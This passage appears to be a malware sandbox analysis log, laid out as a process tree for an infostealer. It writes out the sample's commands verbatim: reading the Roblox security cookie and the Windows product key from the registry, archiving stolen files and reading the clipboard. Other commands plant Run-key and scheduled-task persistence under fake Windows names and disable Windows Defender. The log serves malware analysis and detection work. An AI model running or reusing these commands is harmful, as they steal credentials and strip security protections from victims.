        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4184
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5248"
        6⤵
        
        PID:1844
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5248
        7⤵
        Kills process with taskkill
        
        PID:4408
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        6⤵
        
        PID:1432
        
        C:\Windows\system32\getmac.exe
        
        getmac
        7⤵
        
        PID:5176
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        6⤵
        
        PID:5816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4496
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31202\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\zFdMC.zip" *"
        6⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\_MEI31202\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI31202\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\zFdMC.zip" *
        7⤵
        Executes dropped EXE
        
        PID:1840
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        6⤵
        
        PID:2820
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        7⤵
        
        PID:452
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        6⤵
        
        PID:4536
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        7⤵
        
        PID:1964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:4800
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:5264
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        6⤵
        
        PID:4908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1816
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:3136
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:5344
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        6⤵
        
        PID:856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        7⤵
        
        PID:4660
  - - C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
      "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:360
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "WindowsDataUpdater" /sc ONLOGON /tr "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5192
  - - C:\Windows\system32\java.exe
      "C:\Windows\system32\java.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:5812
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BD02.tmp\BD03.tmp\BD04.bat C:\Windows\system32\java.exe"
        5⤵
        Drops file in System32 directory
        
        PID:2024
      - C:\Windows\system32\timeout.exe
        
        timeout 1
        6⤵
        Delays execution with timeout.exe
        
        PID:2528
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        6⤵
        Adds Run key to start application
        
        PID:3364
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        6⤵
        Adds Run key to start application
        
        PID:3164
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        6⤵
        Adds Run key to start application
        
        PID:5572
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        6⤵
        Adds Run key to start application
        
        PID:1912
      - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        6⤵
        Executes dropped EXE
        
        PID:4980
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4440
      - C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5912
      - C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5800
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D721.tmp\D722.tmp\D723.bat C:\Windows\system32\java.exe"
        7⤵
        Drops file in System32 directory
        
        PID:2756
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        8⤵
        Delays execution with timeout.exe
        
        PID:1688
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        8⤵
        Adds Run key to start application
        
        PID:5260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        8⤵
        Adds Run key to start application
        
        PID:2264
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        8⤵
        Adds Run key to start application
        
        PID:4312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        8⤵
        Adds Run key to start application
        
        PID:1664
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        8⤵
        Executes dropped EXE
        
        PID:3992
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:664
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        8⤵
        Executes dropped EXE
        
        PID:2876
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5312
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E990.tmp\E991.tmp\E992.bat C:\Windows\system32\java.exe"
        9⤵
        
        PID:2632
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        10⤵
        Delays execution with timeout.exe
        
        PID:5404
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        10⤵
        Adds Run key to start application
        
        PID:664
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        10⤵
        Adds Run key to start application
        
        PID:4184
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        10⤵
        Adds Run key to start application
        
        PID:4660
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        10⤵
        Adds Run key to start application
        
        PID:5448
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        10⤵
        Executes dropped EXE
        
        PID:5436
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4260
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        10⤵
        Executes dropped EXE
        
        PID:5192
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5580
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F41F.tmp\F420.tmp\F421.bat C:\Windows\system32\java.exe"
        11⤵
        Drops file in System32 directory
        
        PID:5784
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        12⤵
        Delays execution with timeout.exe
        
        PID:3016
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        12⤵
        Adds Run key to start application
        
        PID:1636
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        12⤵
        Adds Run key to start application
        
        PID:5080
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        12⤵
        Adds Run key to start application
        
        PID:5064
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        12⤵
        Adds Run key to start application
        
        PID:5020
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        12⤵
        Executes dropped EXE
        
        PID:5936
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        13⤵
        Executes dropped EXE
        
        PID:5856
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        12⤵
        Executes dropped EXE
        
        PID:4732
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5448
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FA3A.tmp\FA3B.tmp\FA3C.bat C:\Windows\system32\java.exe"
        13⤵
        Drops file in System32 directory
        
        PID:5320
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        14⤵
        Delays execution with timeout.exe
        
        PID:4420
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        14⤵
        Adds Run key to start application
        
        PID:4776
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        14⤵
        Adds Run key to start application
        
        PID:5456
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        14⤵
        Adds Run key to start application
        
        PID:5368
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        14⤵
        Adds Run key to start application
        
        PID:1028
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        14⤵
        Executes dropped EXE
        
        PID:2256
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        15⤵
        Executes dropped EXE
        
        PID:5640
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        14⤵
        Executes dropped EXE
        
        PID:5688
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2252
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\287.tmp\288.tmp\289.bat C:\Windows\system32\java.exe"
        15⤵
        Drops file in System32 directory
        
        PID:2092
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        16⤵
        Delays execution with timeout.exe
        
        PID:208
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        16⤵
        Adds Run key to start application
        
        PID:4280
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        16⤵
        Adds Run key to start application
        
        PID:5420
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        16⤵
        Adds Run key to start application
        
        PID:5176
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        16⤵
        Adds Run key to start application
        
        PID:6028
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        16⤵
        Executes dropped EXE
        
        PID:1260
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        17⤵
        Executes dropped EXE
        
        PID:6064
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        16⤵
        Executes dropped EXE
        
        PID:5864
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5268
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A28.tmp\A29.tmp\A2A.bat C:\Windows\system32\java.exe"
        17⤵
        
        PID:4984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:2876
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        18⤵
        Delays execution with timeout.exe
        
        PID:3780
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        18⤵
        
        PID:4836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        18⤵
        
        PID:2892
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        18⤵
        
        PID:1688
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        18⤵
        
        PID:5944
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        18⤵
        
        PID:5736
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        19⤵
        
        PID:2076
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        18⤵
        
        PID:1596
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        18⤵
        
        PID:996
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1236.tmp\1237.tmp\1238.bat C:\Windows\system32\java.exe"
        19⤵
        
        PID:6040
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        20⤵
        Delays execution with timeout.exe
        
        PID:6048
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        20⤵
        
        PID:5676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        20⤵
        
        PID:4852
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        20⤵
        
        PID:1740
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        20⤵
        
        PID:4420
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        20⤵
        
        PID:3380
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        21⤵
        
        PID:5500
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        20⤵
        
        PID:5432
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        20⤵
        
        PID:4964
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\195A.tmp\195B.tmp\195C.bat C:\Windows\system32\java.exe"
        21⤵
        
        PID:6008
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        22⤵
        Delays execution with timeout.exe
        
        PID:1840
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        22⤵
        
        PID:6024
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        22⤵
        
        PID:5420
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        22⤵
        
        PID:3872
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        22⤵
        
        PID:4448
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        22⤵
        
        PID:3312
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        23⤵
        
        PID:492
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        22⤵
        
        PID:5624
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        22⤵
        
        PID:5488
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\210B.tmp\210C.tmp\210D.bat C:\Windows\system32\java.exe"
        23⤵
        
        PID:5108
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        24⤵
        Delays execution with timeout.exe
        
        PID:2688
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        24⤵
        
        PID:4804
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        24⤵
        
        PID:5220
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        24⤵
        
        PID:5876
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        24⤵
        
        PID:5312
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        24⤵
        
        PID:5768
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        25⤵
        
        PID:5064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
        26⤵
        
        PID:6024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        26⤵
        
        PID:4236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
        26⤵
        
        PID:5420
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
        27⤵
        
        PID:1472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:5316
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:1836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        26⤵
        
        PID:5156
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        27⤵
        
        PID:1976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        26⤵
        
        PID:928
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        27⤵
        
        PID:2120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        26⤵
        
        PID:2728
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        27⤵
        
        PID:4480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        26⤵
        
        PID:5404
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        26⤵
        
        PID:3312
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:5152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:6024
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:5776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:8
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:4484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        26⤵
        
        PID:3396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:5988
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        27⤵
        
        PID:5688
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        26⤵
        Clipboard Data
        
        PID:2628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        27⤵
        Clipboard Data
        
        PID:1964
        
        C:\Windows\system32\cmd.exe
        
